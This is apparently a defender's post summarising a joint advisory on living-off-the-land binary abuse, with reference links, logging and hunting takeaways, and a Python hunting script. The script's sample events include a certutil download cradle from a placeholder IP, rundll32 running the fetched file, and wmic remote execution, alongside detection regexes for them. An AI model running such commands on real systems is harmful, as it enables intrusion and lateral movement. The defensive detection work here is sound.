A joint advisory authored by MANY different agencies covers common living off the land (LOTL) techniques and the common gaps in cyber defence capabilities that let them succeed.
As the advisory puts it: "Living off the Land involves the abuse of native tools and processes on systems, especially living off the land binaries, often referred to as LOLBins, to blend in with normal system activities and operate discreetly with a lower likelihood of being detected or blocked because these tools are already deployed and trusted in the environment."
To simplify: LOLBins are administrative tools, typically used by your IT admins and staff, that threat actors abuse for nefarious purposes. Because the binaries are legitimate and often signed, the tell is not the tool itself but who ran it, from where, with which arguments.
Resources for living-off-the-land binaries (LOLBins) and related abused components across different operating systems can be found here:
- Windows LOLBins (LOLBAS project): https://lolbas-project.github.io/#
- Unix LOLBins (GTFOBins): https://gtfobins.github.io/
- macOS LOLBins (LOOBins): https://www.loobins.io/
- Windows drivers abused by adversaries (LOLDrivers; drivers rather than LOLBins, but the same "trusted component, hostile use" problem): https://www.loldrivers.io/
A MUST READ for defenders and network administrators, because these techniques are not typically detected or prevented by security applications and monitoring tools that look for malicious files rather than malicious use of legitimate ones. Some key takeaways from my read so far (I'm still reviewing) include:
- Implement comprehensive logging (process creation with full command lines, authentication, remote administration) and aggregate the logs in a centralised location that is tamper-proof.
- Adversaries are known not only to conduct anti-forensics but also to modify or clear logs that are kept insecurely on the host they have compromised; a copy shipped off-host as events occur is what survives.
- Threat hunt these logs! Central collection only helps if someone is actually querying it for LOLBin use that does not fit the environment.
- Have IT collaborate with security teams to understand typical administrative workflows (which accounts run which tools, from which hosts), so that authentic LOLBin activity can be distinguished from a potential intrusion.
- Do not underestimate the security gaps in Unix-like systems (Linux and macOS). The joint advisory provides examples of LOLBin abuse on Unix systems by PRC and Russian state-sponsored actors.
- Guidance on macOS hardening: https://www.ncsc.gov.uk/collection/device-security-guidance/platform-guides/macos & https://github.com/usnistgov/macos_security
- Guidance on Linux hardening: SELinux – https://www.redhat.com/en/topics/linux/what-is-selinux & https://github.blog/2023-07-05-introduction-to-selinux/ & https://www.cisecurity.org/benchmark/red_hat_linux
- Cloud security is just as important as on-premises security. Lateral movement from cloud to on-premises environments is on the rise.
- Secure your Microsoft 365 and Google Workspace environments (CISA's SCuBA project): https://www.cisa.gov/resources-tools/services/secure-cloud-business-applications-scuba-project
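To show what the logging, hunting and IT-baseline takeaways look like in practice, here is an added example that is not part of the advisory or of this post: a small Python hunt over process-creation events. The events, the detection rules, the baseline of agreed admin usage and every host, user, IP and command line are constructed assumptions for the example, not real telemetry or published rules. It grades a rule hit against the IT-agreed baseline (known admin pair from a normal parent gets "review", everything else "alert") and stacks user/image pairs so that rare combinations surface for a hunter.

```python
"""Added example: hunting LOLBin abuse in centrally collected process-creation logs.

All data below is constructed for illustration (Sysmon Event ID 1 style fields);
the rules and the IT baseline are assumptions, not a published ruleset.
"""
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    host: str
    user: str
    parent: str   # parent image name, lower-case
    image: str    # spawned image name, lower-case
    cmdline: str


# Detection rules: (rule name, LOLBin image, regex over the command line).
# Each pattern is a well-known abuse shape of that binary (download cradle,
# proxy execution of a non-DLL file, remote process creation); assumed here.
RULES = [
    ("certutil_download", "certutil.exe",
     re.compile(r"-urlcache\b.*https?://", re.I)),
    ("rundll32_nonstandard_dll", "rundll32.exe",
     re.compile(r"^rundll32(\.exe)?\s+\S+\.(txt|dat|png|tmp)\b", re.I)),
    ("wmic_remote_exec", "wmic.exe",
     re.compile(r"/node:\S+.*process\s+call\s+create", re.I)),
]

# Parents that should essentially never spawn administrative LOLBins.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Baseline agreed with IT: (user, image) pairs that are legitimate daily workflow.
# Hypothetical values for the example.
IT_BASELINE = {
    ("CORP\\it-admin", "wmic.exe"),
    ("CORP\\it-admin", "certutil.exe"),
}

# Constructed sample events (not real telemetry). 203.0.113.5 is a documentation IP.
EVENTS = [
    ProcEvent("ws01", "CORP\\jdoe", "explorer.exe", "excel.exe", "EXCEL.EXE Q3-forecast.xlsx"),
    ProcEvent("ws01", "CORP\\jdoe", "excel.exe", "certutil.exe",
              "certutil -urlcache -split -f http://203.0.113.5/update.txt update.txt"),
    ProcEvent("ws01", "CORP\\jdoe", "cmd.exe", "rundll32.exe", "rundll32 update.txt,Start"),
    ProcEvent("srv02", "CORP\\it-admin", "cmd.exe", "certutil.exe", "certutil -f -p pw -importpfx corp.pfx"),
    ProcEvent("srv02", "CORP\\it-admin", "cmd.exe", "wmic.exe",
              'wmic /node:ws05 process call create "cmd /c gpupdate /force"'),
    ProcEvent("srv03", "CORP\\svc-backup", "cmd.exe", "robocopy.exe", "robocopy D:\\data \\\\nas01\\bk /MIR"),
    ProcEvent("ws01", "CORP\\jdoe", "powershell.exe", "wmic.exe",
              'wmic /node:dc01 process call create "cmd /c whoami"'),
]
# Routine repeated activity (constructed) so the frequency stacking has a baseline to rank against.
EVENTS += [ProcEvent("srv03", "CORP\\svc-backup", "cmd.exe", "robocopy.exe",
                     f"robocopy D:\\data \\\\nas01\\bk{i} /MIR") for i in range(5)]


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str   # "alert" or "review"
    event: ProcEvent


def classify(event, baseline=IT_BASELINE):
    """Apply every rule to one event and grade each hit against the IT baseline."""
    findings = []
    for name, image, pattern in RULES:
        if event.image != image or not pattern.search(event.cmdline):
            continue
        in_baseline = (event.user, event.image) in baseline
        suspicious_parent = event.parent in OFFICE_PARENTS
        # Baselined admin usage from a normal parent is a low-priority review item;
        # anything else, including a baselined user spawned from Office, is an alert.
        severity = "review" if in_baseline and not suspicious_parent else "alert"
        findings.append(Finding(name, severity, event))
    return findings


def hunt(events, baseline=IT_BASELINE):
    """Run the rules over the whole central log and return findings in event order."""
    return [f for e in events for f in classify(e, baseline)]


def stack_user_image(events):
    """Frequency stacking of (user, image): common pairs are workflow, rare pairs are leads."""
    return Counter((e.user, e.image) for e in events)


def rare_pairs(events, max_count=1):
    """(user, image) pairs seen at most max_count times, i.e. where a hunter starts."""
    return sorted(pair for pair, n in stack_user_image(events).items() if n <= max_count)


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"[{f.severity.upper():6}] {f.rule:25} {f.event.host} {f.event.user} :: {f.event.cmdline}")
    print("rare user/image pairs:", rare_pairs(EVENTS))
```

The same `it-admin` running `wmic /node:... process call create` lands as "review" because IT told security that is how they manage hosts, while the identical command from `jdoe` is an alert; that distinction is exactly what the collaboration takeaway buys you, and it only works if the command line and parent process were logged and shipped off the endpoint in the first place.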
This advisory builds on a previous joint advisory published by CISA on a PRC state-sponsored adversary using LOTL techniques: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a